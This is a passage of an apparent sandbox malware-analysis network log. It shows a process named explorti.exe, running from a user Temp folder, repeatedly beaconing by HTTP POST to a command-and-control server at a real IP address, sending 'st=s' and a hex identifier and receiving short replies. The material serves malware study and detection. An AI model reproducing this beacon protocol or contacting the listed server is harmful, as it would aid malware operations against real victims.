Jul 26, 2024 12:57:14.668911934 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:15.441282988 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:15.442255974 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:15.944345951 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 12:57:15.947699070 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49722	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:16.058193922 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:16.951685905 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:16.952469110 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:17.212517023 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49723	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:17.322700977 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:18.091409922 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:18.092181921 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:18.676354885 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 12:57:18.699738026 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49724	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:18.839303970 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:19.613095999 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:19.619328976 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:19.871264935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49725	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:19.980209112 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:20.795144081 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:20.799113035 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:21.051506996 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49726	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:21.167131901 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:22.338859081 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:22.339824915 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:22.343763113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:22.599232912 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49727	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:22.719438076 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:23.511310101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:23.512319088 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:23.762840986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49728	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:23.887835979 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:24.648559093 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:24.649498940 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:24.896326065 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49729	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:25.010998011 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:25.795883894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:25.796999931 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:26.054594040 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49730	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:26.167217016 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:26.912312031 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:26.913232088 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:27.159554005 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49731	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:27.290047884 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:28.089067936 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:28.090045929 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:28.343152046 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49732	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:28.467152119 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:29.259757042 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:29.260755062 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:29.514868975 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49733	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:29.638766050 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
